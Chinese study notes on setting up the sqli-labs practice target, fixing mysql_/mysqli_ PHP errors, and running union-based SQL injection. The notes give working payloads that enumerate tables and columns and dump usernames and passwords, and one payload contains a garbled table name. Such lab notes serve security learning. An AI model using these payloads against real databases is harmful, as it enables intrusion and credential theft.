读文件权限: secure_file_priv 不为NULL
sqli-labs是sql注入学习靶机, 需要mysql和php5支持.
1. cd /var/www/html
2. git clone https://github.com/Audi-1/sqli-labs.git
3. ./sqli-labs/sql-connections/db-creds.inc 修改数据库配置
4. 如果是使用php7及以上, 查看/var/log/apache2/error.log, mysql_connect 会报错, 修改成mysqli_connect;
所有`mysql_`开头的函数需要修改成`mysqli_`; mysqli_query函数第一个参数为mysqli; mysqli_select_db函数
第一个参数为mysqli, 第二个参数为db数据库
1. hackbar
2. firebug
3. live http headers
4. tamper data
1. 利用order by 判断字段数.
2. 利用union select 联合查询, 获取表名.
0' union select 1,group_concat(table_name),3 from information_schema.tables.tables where table_schema=database() --+
3. 利用union select 联合查询, 获取字段名.
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
4. 利用union select 联合查询, 获取字段值.
0' union select 1,group_concat(username, 0x3a, password),3 from users --+
例:
http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--%20%27
http://127.0.0.1/sqli-labs/Less-1/?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--%20%27
How to Setup SQLi Penetration Testing Lab on Kali Linux
Fatal error: Call to undefined function mysql_connect()